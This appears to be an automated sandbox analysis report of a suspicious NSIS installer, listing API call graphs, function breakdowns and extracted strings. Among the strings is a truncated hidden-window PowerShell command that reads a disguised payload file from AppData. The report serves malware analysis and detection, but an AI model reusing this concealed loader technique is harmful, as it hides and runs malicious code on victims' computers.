3862->3853 3865 403fd8 SendMessageW 3862->3865 3863->3874 3868 403ea1 GetDlgItem 3864->3868 3869 403f3e 3864->3869 3865->3874 3866 40140b 2 API calls 3866->3884 3867 404261 DestroyWindow KiUserCallbackDispatcher 3867->3913 3870 403ed1 3868->3870 3871 403eb4 SendMessageW IsWindowEnabled 3868->3871 3872 40433d 8 API calls 3869->3872 3876 403ede 3870->3876 3877 403f25 SendMessageW 3870->3877 3878 403ef1 3870->3878 3888 403ed6 3870->3888 3871->3870 3871->3874 3872->3874 3873 404290 ShowWindow 3873->3874 3875 406234 18 API calls 3875->3884 3876->3877 3876->3888 3877->3869 3881 403ef9 3878->3881 3882 403f0e 3878->3882 3879 4042af SendMessageW 3883 403f0c 3879->3883 3880 4042d6 19 API calls 3880->3884 3886 40140b 2 API calls 3881->3886 3885 40140b 2 API calls 3882->3885 3883->3869 3884->3866 3884->3867 3884->3874 3884->3875 3884->3880 3889 4042d6 19 API calls 3884->3889 3904 4041a1 DestroyWindow 3884->3904 3887 403f15 3885->3887 3886->3888 3887->3869 3887->3888 3888->3879 3890 404089 GetDlgItem 3889->3890 3891 4040a6 ShowWindow KiUserCallbackDispatcher 3890->3891 3892 40409e 3890->3892 3914 4042f8 KiUserCallbackDispatcher 3891->3914 3892->3891 3894 4040d0 EnableWindow 3897 4040e4 3894->3897 3895 4040e9 GetSystemMenu EnableMenuItem SendMessageW 3896 404119 SendMessageW 3895->3896 3895->3897 3896->3897 3897->3895 3915 40430b SendMessageW 3897->3915 3916 406212 lstrcpynW 3897->3916 3900 404147 lstrlenW 3901 406234 18 API calls 3900->3901 3902 40415d SetWindowTextW 3901->3902 3903 401389 2 API calls 3902->3903 3903->3884 3905 4041bb CreateDialogParamW 3904->3905 3904->3913 3906 4041ee 3905->3906 3905->3913 3907 4042d6 19 API calls 3906->3907 3908 4041f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3907->3908 3909 401389 2 API calls 3908->3909 3910 40423f 3909->3910 3910->3874 3911 404247 ShowWindow 3910->3911 3912 404322 SendMessageW 3911->3912 3912->3913 3913->3873 3913->3874 3914->3894 3915->3897 3916->3900 3917 40287e 3918 402c53 18 API calls 3917->3918 3919 402885 FindFirstFileW 3918->3919 3920 402898 3919->3920 3921 4028ad 3919->3921 3922 4028b6 3921->3922 3925 406159 wsprintfW 3921->3925 3926 406212 lstrcpynW 3922->3926 3925->3922 3926->3920 4394 4019ff 4395 402c53 18 API calls 4394->4395 4396 401a06 4395->4396 4397 402c53 18 API calls 4396->4397 4398 401a0f 4397->4398 4399 401a16 lstrcmpiW 4398->4399 4400 401a28 lstrcmpW 4398->4400 4401 401a1c 4399->4401 4400->4401 4402 401000 4403 401037 BeginPaint GetClientRect 4402->4403 4404 40100c DefWindowProcW 4402->4404 4406 4010f3 4403->4406 4407 401179 4404->4407 4408 401073 CreateBrushIndirect FillRect DeleteObject 4406->4408 4409 4010fc 4406->4409 4408->4406 4410 401102 CreateFontIndirectW 4409->4410 4411 401167 EndPaint 4409->4411 4410->4411 4412 401112 6 API calls 4410->4412 4411->4407 4412->4411 4413 401503 4414 40150b 4413->4414 4416 40151e 4413->4416 4415 402c31 18 API calls 4414->4415 4415->4416 4417 402104 4418 402c53 18 API calls 4417->4418 4419 40210b 4418->4419 4420 402c53 18 API calls 4419->4420 4421 402115 4420->4421 4422 402c53 18 API calls 4421->4422 4423 40211f 4422->4423 4424 402c53 18 API calls 4423->4424 4425 402129 4424->4425 4426 402c53 18 API calls 4425->4426 4428 402133 4426->4428 4427 402172 CoCreateInstance 4432 402191 4427->4432 4428->4427 4429 402c53 18 API calls 4428->4429 4429->4427 4430 401423 25 API calls 4431 402250 4430->4431 4432->4430 4432->4431 4433 402805 4434 40280c 4433->4434 4436 402a86 4433->4436 4435 402c31 18 API calls 4434->4435 4437 402813 4435->4437 4438 402822 SetFilePointer 4437->4438 4438->4436 4439 402832 4438->4439 4441 406159 wsprintfW 4439->4441 4441->4436 3661 40230c 3662 402314 3661->3662 3665 40231a 3661->3665 3663 402c53 18 API calls 3662->3663 3663->3665 3664 402c53 18 API calls 3666 402328 3664->3666 3665->3664 3665->3666 3667 402c53 18 API calls 3666->3667 3669 402336 3666->3669 3667->3669 3668 402c53 18 API calls 3670 40233f WritePrivateProfileStringW 3668->3670 3669->3668 4442 40190c 4443 401943 4442->4443 4444 402c53 18 API calls 4443->4444 4445 401948 4444->4445 4446 405a03 69 API calls 4445->4446 4447 401951 4446->4447 4448 401f8c 4449 402c53 18 API calls 4448->4449 4450 401f93 4449->4450 4451 4065ec 5 API calls 4450->4451 4452 401fa2 4451->4452 4453 401fbe GlobalAlloc 4452->4453 4456 402026 4452->4456 4454 401fd2 4453->4454 4453->4456 4455 4065ec 5 API calls 4454->4455 4457 401fd9 4455->4457 4458 4065ec 5 API calls 4457->4458 4459 401fe3 4458->4459 4459->4456 4463 406159 wsprintfW 4459->4463 4461 402018 4464 406159 wsprintfW 4461->4464 4463->4461 4464->4456 4465 40258c 4466 402c53 18 API calls 4465->4466 4467 402593 4466->4467 4470 405de7 GetFileAttributesW CreateFileW 4467->4470 4469 40259f 4470->4469 3671 40238e 3672 402393 3671->3672 3673 4023be 3671->3673 3684 402d5d 3672->3684 3675 402c53 18 API calls 3673->3675 3678 4023c5 3675->3678 3676 40239a 3677 4023a4 3676->3677 3679 4023dd 3676->3679 3680 402c53 18 API calls 3677->3680 3688 402c93 RegOpenKeyExW 3678->3688 3682 4023ab RegDeleteValueW RegCloseKey 3680->3682 3682->3679 3685 402c53 18 API calls 3684->3685 3686 402d76 3685->3686 3687 402d84 RegOpenKeyExW 3686->3687 3687->3676 3692 402cbe 3688->3692 3697 4023db 3688->3697 3689 402ce4 RegEnumKeyW 3690 402cf6 RegCloseKey 3689->3690 3689->3692 3691 4065ec 5 API calls 3690->3691 3694 402d06 3691->3694 3692->3689 3692->3690 3693 402d1b RegCloseKey 3692->3693 3695 402c93 5 API calls 3692->3695 3693->3697 3696 402d36 RegDeleteKeyW 3694->3696 3694->3697 3695->3692 3696->3697 3697->3679 4471 401d0e 4472 402c31 18 API calls 4471->4472 4473 401d15 4472->4473 4474 402c31 18 API calls 4473->4474 4475 401d21 GetDlgItem 4474->4475 4476 4025a8 4475->4476 4477 40190f 4478 402c53 18 API calls 4477->4478 4479 401916 4478->4479 4480 405957 MessageBoxIndirectW 4479->4480 4481 40191f 4480->4481 3808 402511 3809 402d5d 19 API calls 3808->3809 3810 40251b 3809->3810 3811 402c31 18 API calls 3810->3811 3812 402524 3811->3812 3813 402533 3812->3813 3817 4028a1 3812->3817 3814 402540 RegEnumKeyW 3813->3814 3815 40254c RegEnumValueW 3813->3815 3816 402565 RegCloseKey 3814->3816 3815->3816 3815->3817 3816->3817 4496 401491 4497 405371 25 API calls 4496->4497 4498 401498 4497->4498 4506 402d98 4507 402daa SetTimer 4506->4507 4509 402dc3 4506->4509 4507->4509 4508 402e11 4509->4508 4510 402e17 MulDiv 4509->4510 4511 402dd1 wsprintfW SetWindowTextW SetDlgItemTextW 4510->4511 4511->4508 4513 401c19 4514 402c31 18 API calls 4513->4514 4515 401c20 4514->4515 4516 402c31 18 API calls 4515->4516 4517 401c2d 4516->4517 4518 402c53 18 API calls 4517->4518 4519 401c42 4517->4519 4518->4519 4520 402c53 18 API calls 4519->4520 4525 401c52 4519->4525 4520->4525 4521 401ca9 4524 402c53 18 API calls 4521->4524 4522 401c5d 4523 402c31 18 API calls 4522->4523 4526 401c62 4523->4526 4527 401cae 4524->4527 4525->4521 4525->4522 4528 402c31 18 API calls 4526->4528 4529 402c53 18 API calls 4527->4529 4530 401c6e 4528->4530 4531 401cb7 FindWindowExW 4529->4531 4532 401c99 SendMessageW 4530->4532 4533 401c7b SendMessageTimeoutW 4530->4533 4534 401cd9 4531->4534 4532->4534 4533->4534 4535 403a19 4536 403a24 4535->4536 4537 403a28 4536->4537 4538 403a2b GlobalAlloc 4536->4538 4538->4537 4539 40249d 4540 402d5d 19 API calls 4539->4540 4541 4024a7 4540->4541 4542 402c53 18 API calls 4541->4542 4543 4024b0 4542->4543 4544 4028a1 4543->4544 4545 4024bb RegQueryValueExW 4543->4545 4546 4024db 4545->4546 4549 4024e1 RegCloseKey 4545->4549 4546->4549 4550 406159 wsprintfW 4546->4550 4549->4544 4550->4549 4551 40149e 4552 4022f7 4551->4552 4553 4014ac PostQuitMessage 4551->4553 4553->4552 4554 4015a3 4555 402c53 18 API calls 4554->4555 4556 4015aa SetFileAttributesW 4555->4556 4557 4015bc 4556->4557 4558 404424 lstrlenW 4559 404443 4558->4559 4560 404445 WideCharToMultiByte 4558->4560 4559->4560 4568 40472a 4569 404760 4568->4569 4570 40473a 4568->4570 4572 40433d 8 API calls 4569->4572 4571 4042d6 19 API calls 4570->4571 4573 404747 SetDlgItemTextW 4571->4573 4574 40476c 4572->4574 4573->4569 4575 4025ae 4576 4025c2 4575->4576 4577 4025dd 4575->4577 4580 402c31 18 API calls 4576->4580 4578 402611 4577->4578 4579 4025e2 4577->4579 4582 402c53 18 API calls 4578->4582 4581 402c53 18 API calls 4579->4581 4585 4025c9 4580->4585 4583 4025e9 WideCharToMultiByte lstrlenA 4581->4583 4584 402618 lstrlenW 4582->4584 4583->4585 4584->4585 4586 40265b 4585->4586 4587 402645 4585->4587 4589 405ec8 5 API calls 4585->4589 4587->4586 4588 405e99 WriteFile 4587->4588 4588->4586 4589->4587 3739 4054b0 3740 4054d1 GetDlgItem GetDlgItem GetDlgItem 3739->3740 3741 40565a 3739->3741 3784 40430b SendMessageW 3740->3784 3743 405663 GetDlgItem CreateThread CloseHandle 3741->3743 3744 40568b 3741->3744 3743->3744 3807 405444 5 API calls 3743->3807 3746 4056b6 3744->3746 3747 4056a2 ShowWindow ShowWindow 3744->3747 3748 4056db 3744->3748 3745 405541 3752 405548 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3745->3752 3749 4056f0 ShowWindow 3746->3749 3750 4056ca 3746->3750 3753 405716 3746->3753 3789 40430b SendMessageW 3747->3789 3793 40433d 3748->3793 3757 405710 3749->3757 3758 405702 3749->3758 3790 4042af 3750->3790 3759 4055b6 3752->3759 3760 40559a SendMessageW SendMessageW 3752->3760 3753->3748 3761 405724 SendMessageW 3753->3761 3756 4056e9 3763 4042af SendMessageW 3757->3763 3762 405371 25 API calls 3758->3762 3764 4055c9 3759->3764 3765 4055bb SendMessageW 3759->3765 3760->3759 3761->3756 3766 40573d CreatePopupMenu 3761->3766 3762->3757 3763->3753 3785 4042d6 3764->3785 3765->3764 3768 406234 18 API calls 3766->3768 3769 40574d AppendMenuW 3768->3769 3771 40576a GetWindowRect 3769->3771 3772 40577d TrackPopupMenu 3769->3772 3770 4055d9 3773 4055e2 ShowWindow 3770->3773 3774 405616 GetDlgItem SendMessageW 3770->3774 3771->3772 3772->3756 3775 405798 3772->3775 3776 4055f8 ShowWindow 3773->3776 3779 405605 3773->3779 3774->3756 3777 40563d SendMessageW SendMessageW 3774->3777 3778 4057b4 SendMessageW 3775->3778 3776->3779 3777->3756 3778->3778 3780 4057d1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3778->3780 3788 40430b SendMessageW 3779->3788 3782 4057f6 SendMessageW 3780->3782 3782->3782 3783 40581f GlobalUnlock SetClipboardData CloseClipboard 3782->3783 3783->3756 3784->3745 3786 406234 18 API calls 3785->3786 3787 4042e1 SetDlgItemTextW 3786->3787 3787->3770 3788->3774 3789->3746 3791 4042b6 3790->3791 3792 4042bc SendMessageW 3790->3792 3791->3792 3792->3748 3794 404355 GetWindowLongW 3793->3794 3804 4043de 3793->3804 3795 404366 3794->3795 3794->3804 3796 404375 GetSysColor 3795->3796 3797 404378 3795->3797 3796->3797 3798 404388 SetBkMode 3797->3798 3799 40437e SetTextColor 3797->3799 3800 4043a0 GetSysColor 3798->3800 3801 4043a6 3798->3801 3799->3798 3800->3801 3802 4043b7 3801->3802 3803 4043ad SetBkColor 3801->3803 3802->3804 3805 4043d1 CreateBrushIndirect 3802->3805 3806 4043ca DeleteObject 3802->3806 3803->3802 3804->3756 3805->3804 3806->3805 4590 401a30 4591 402c53 18 API calls 4590->4591 4592 401a39 ExpandEnvironmentStringsW 4591->4592 4593 401a4d 4592->4593 4595 401a60 4592->4595 4594 401a52 lstrcmpW 4593->4594 4593->4595 4594->4595 4601 402032 4602 402044 4601->4602 4603 4020f6 4601->4603 4604 402c53 18 API calls 4602->4604 4606 401423 25 API calls 4603->4606 4605 40204b 4604->4605 4607 402c53 18 API calls 4605->4607 4611 402250 4606->4611 4608 402054 4607->4608 4609 40206a LoadLibraryExW 4608->4609 4610 40205c GetModuleHandleW 4608->4610 4609->4603 4612 40207b 4609->4612 4610->4609 4610->4612 4621 40665b WideCharToMultiByte 4612->4621 4615 4020c5 4617 405371 25 API calls 4615->4617 4616 40208c 4618 401423 25 API calls 4616->4618 4619 40209c 4616->4619 4617->4619 4618->4619 4619->4611 4620 4020e8 FreeLibrary 4619->4620 4620->4611 4622 406685 GetProcAddress 4621->4622 4623 402086 4621->4623 4622->4623 4623->4615 4623->4616 4624 401d33 4625 402c31 18 API calls 4624->4625 4626 401d44 SetWindowLongW 4625->4626 4627 402adb 4626->4627 4628 401db3 GetDC 4629 402c31 18 API calls 4628->4629 4630 401dc5 GetDeviceCaps MulDiv ReleaseDC 4629->4630 4631 402c31 18 API calls 4630->4631 4632 401df6 4631->4632 4633 406234 18 API calls 4632->4633 4634 401e33 CreateFontIndirectW 4633->4634 4635 4025a8 4634->4635 4636 401735 4637 402c53 18 API calls 4636->4637 4638 40173c SearchPathW 4637->4638 4639 401757 4638->4639 4640 402ab6 SendMessageW 4641 402ad0 InvalidateRect 4640->4641 4642 402adb 4640->4642 4641->4642 4643 402837 4644 40283d 4643->4644 4645 402845 FindClose 4644->4645 4646 402adb 4644->4646 4645->4646 4647 4014b8 4648 4014be 4647->4648 4649 401389 2 API calls 4648->4649 4650 4014c6 4649->4650 4651 4029be 4652 402c31 18 API calls 4651->4652 4653 4029c4 4652->4653 4654 402a04 4653->4654 4655 4029eb 4653->4655 4663 4028a1 4653->4663 4656 402a1e 4654->4656 4657 402a0e 4654->4657 4658 4029f0 4655->4658 4664 402a01 4655->4664 4660 406234 18 API calls 4656->4660 4659 402c31 18 API calls 4657->4659 4665 406212 lstrcpynW 4658->4665 4659->4664 4660->4664 4664->4663 4666 406159 wsprintfW 4664->4666 4665->4663 4666->4663

        Executed Functions

        Function 0040344A Relevance: 93.2, APIs: 34, Strings: 19, Instructions: 401stringfilecomCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 40344a-40347d SetErrorMode GetVersion 1 403490 0->1 2 40347f-403487 call 4065ec 0->2 3 403495-4034a9 call 40657c lstrlenA 1->3 2->1 7 403489 2->7 9 4034ab-40351f call 4065ec * 2 #17 OleInitialize SHGetFileInfoW call 406212 GetCommandLineW call 406212 GetModuleHandleW 3->9 7->1 18 403521-403528 9->18 19 403529-403543 call 405bf3 CharNextW 9->19 18->19 22 403549-40354f 19->22 23 40365a-403674 GetTempPathW call 403419 19->23 24 403551-403556 22->24 25 403558-40355c 22->25 30 403676-403694 GetWindowsDirectoryW lstrcatW call 403419 23->30 31 4036cc-4036e6 DeleteFileW call 402ed5 23->31 24->24 24->25 27 403563-403567 25->27 28 40355e-403562 25->28 32 403626-403633 call 405bf3 27->32 33 40356d-403573 27->33 28->27 30->31 46 403696-4036c6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403419 30->46 50 403797-4037a7 ExitProcess CoUninitialize 31->50 51 4036ec-4036f2 31->51 48 403635-403636 32->48 49 403637-40363d 32->49 37 403575-40357d 33->37 38 40358e-4035c7 33->38 42 403584 37->42 43 40357f-403582 37->43 44 4035e4-40361e 38->44 45 4035c9-4035ce 38->45 42->38 43->38 43->42 44->32 47 403620-403624 44->47 45->44 52 4035d0-4035d8 45->52 46->31 46->50 47->32 56 403645-403653 call 406212 47->56 48->49 49->22 57 403643 49->57 60 4038cd-4038d3 50->60 61 4037ad-4037bd call 405957 ExitProcess 50->61 58 403787-40378e call 403a5b 51->58 59 4036f8-403703 call 405bf3 51->59 53 4035da-4035dd 52->53 54 4035df 52->54 53->44 53->54 54->44 66 403658 56->66 57->66 76 403793 58->76 78 403751-40375b 59->78 79 403705-40373a 59->79 63 403951-403959 60->63 64 4038d5-4038eb GetCurrentProcess OpenProcessToken 60->64 70 40395b 63->70 71 40395f-403963 ExitProcess 63->71 73 403921-40392f call 4065ec 64->73 74 4038ed-40391b LookupPrivilegeValueW AdjustTokenPrivileges 64->74 66->23 70->71 86 403931-40393b 73->86 87 40393d-403948 ExitWindowsEx 73->87 74->73 76->50 80 4037c3-4037d7 call 4058da lstrcatW 78->80 81 40375d-40376b call 405cce 78->81 83 40373c-403740 79->83 94 4037e4-4037fe lstrcatW lstrcmpiW 80->94 95 4037d9-4037df lstrcatW 80->95 81->50 96 40376d-403783 call 406212 * 2 81->96 88 403742-403747 83->88 89 403749-40374d 83->89 86->87 93 40394a-40394c call 40140b 86->93 87->63 87->93 88->89 90 40374f 88->90 89->83 89->90 90->78 93->63 94->50 99 403800-403803 94->99 95->94 96->58 101 403805-40380a call 405840 99->101 102 40380c call 4058bd 99->102 109 403811-40381f SetCurrentDirectoryW 101->109 102->109 110 403821-403827 call 406212 109->110 111 40382c-403855 call 406212 109->111 110->111 115 40385a-403876 call 406234 DeleteFileW 111->115 118 4038b7-4038bf 115->118 119 403878-403888 CopyFileW 115->119 118->115 120 4038c1-4038c8 call 4060b3 118->120 119->118 121 40388a-4038aa call 4060b3 call 406234 call 4058f2 119->121 120->50 121->118 130 4038ac-4038b3 CloseHandle 121->130 130->118
        APIs
        • SetErrorMode.KERNELBASE ref: 0040346D
        • GetVersion.KERNEL32 ref: 00403473
        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
        • #17.COMCTL32(00000007,00000009), ref: 004034BF
        • OleInitialize.OLE32(00000000), ref: 004034C6
        • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
        • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000), ref: 0040350A
        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000020), ref: 00403531
          • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
          • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403688
        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040369C
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036A4
        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
        • DeleteFileW.KERNELBASE(1033), ref: 004036D1
          • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
        • ExitProcess.KERNEL32(?), ref: 00403797
        • CoUninitialize.COMBASE(?), ref: 0040379C
        • ExitProcess.KERNEL32 ref: 004037BD
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037D0
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037DF
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037EA
        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037F6
        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
        • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl,?), ref: 0040386C
        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ej86aa7Ki7.exe,00420EE8,00000001), ref: 00403880
        • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
        • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
        • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
        • ExitProcess.KERNEL32 ref: 00403963
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\afdragsordning$C:\Users\user\AppData\Roaming\afdragsordning$C:\Users\user\Desktop$C:\Users\user\Desktop\Ej86aa7Ki7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl$~nsu
        • API String ID: 354199918-2914278838
        • Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
        • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
        • Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
        • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E
        Function 004054B0 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 131 4054b0-4054cb 132 4054d1-405598 GetDlgItem * 3 call 40430b call 404c0e GetClientRect GetSystemMetrics SendMessageW * 2 131->132 133 40565a-405661 131->133 155 4055b6-4055b9 132->155 156 40559a-4055b4 SendMessageW * 2 132->156 135 405663-405685 GetDlgItem CreateThread CloseHandle 133->135 136 40568b-405698 133->136 135->136 138 4056b6-4056c0 136->138 139 40569a-4056a0 136->139 140 4056c2-4056c8 138->140 141 405716-40571a 138->141 143 4056a2-4056b1 ShowWindow * 2 call 40430b 139->143 144 4056db-4056e4 call 40433d 139->144 145 4056f0-405700 ShowWindow 140->145 146 4056ca-4056d6 call 4042af 140->146 141->144 149 40571c-405722 141->149 143->138 152 4056e9-4056ed 144->152 153 405710-405711 call 4042af 145->153 154 405702-40570b call 405371 145->154 146->144 149->144 157 405724-405737 SendMessageW 149->157 153->141 154->153 160 4055c9-4055e0 call 4042d6 155->160 161 4055bb-4055c7 SendMessageW 155->161 156->155 162 405839-40583b 157->162 163 40573d-405768 CreatePopupMenu call 406234 AppendMenuW 157->163 170 4055e2-4055f6 ShowWindow 160->170 171 405616-405637 GetDlgItem SendMessageW 160->171 161->160 162->152 168 40576a-40577a GetWindowRect 163->168 169 40577d-405792 TrackPopupMenu 163->169 168->169 169->162 172 405798-4057af 169->172 173 405605 170->173 174 4055f8-405603 ShowWindow 170->174 171->162 175 40563d-405655 SendMessageW * 2 171->175 176 4057b4-4057cf SendMessageW 172->176 177 40560b-405611 call 40430b 173->177 174->177 175->162 176->176 178 4057d1-4057f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 176->178 177->171 180 4057f6-40581d SendMessageW 178->180 180->180 181 40581f-405833 GlobalUnlock SetClipboardData CloseClipboard 180->181 181->162
        APIs
        • GetDlgItem.USER32(?,00000403), ref: 0040550E
        • GetDlgItem.USER32(?,000003EE), ref: 0040551D
        • GetClientRect.USER32(?,?), ref: 0040555A
        • GetSystemMetrics.USER32(00000002), ref: 00405561
        • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
        • ShowWindow.USER32(?,00000008), ref: 004055FD
        • GetDlgItem.USER32(?,000003EC), ref: 0040561E
        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
        • GetDlgItem.USER32(?,000003F8), ref: 0040552C
          • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
        • GetDlgItem.USER32(?,000003EC), ref: 00405670
        • CreateThread.KERNELBASE(00000000,00000000,Function_00005444,00000000), ref: 0040567E
        • CloseHandle.KERNELBASE(00000000), ref: 00405685
        • ShowWindow.USER32(00000000), ref: 004056A9
        • ShowWindow.USER32(?,00000008), ref: 004056AE
        • ShowWindow.USER32(00000008), ref: 004056F8
        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
        • CreatePopupMenu.USER32 ref: 0040573D
        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
        • GetWindowRect.USER32(?,?), ref: 00405771
        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
        • OpenClipboard.USER32(00000000), ref: 004057D2
        • EmptyClipboard.USER32 ref: 004057D8
        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
        • GlobalLock.KERNEL32(00000000), ref: 004057EE
        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
        • GlobalUnlock.KERNEL32(00000000), ref: 00405822
        • SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
        • CloseClipboard.USER32 ref: 00405833
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
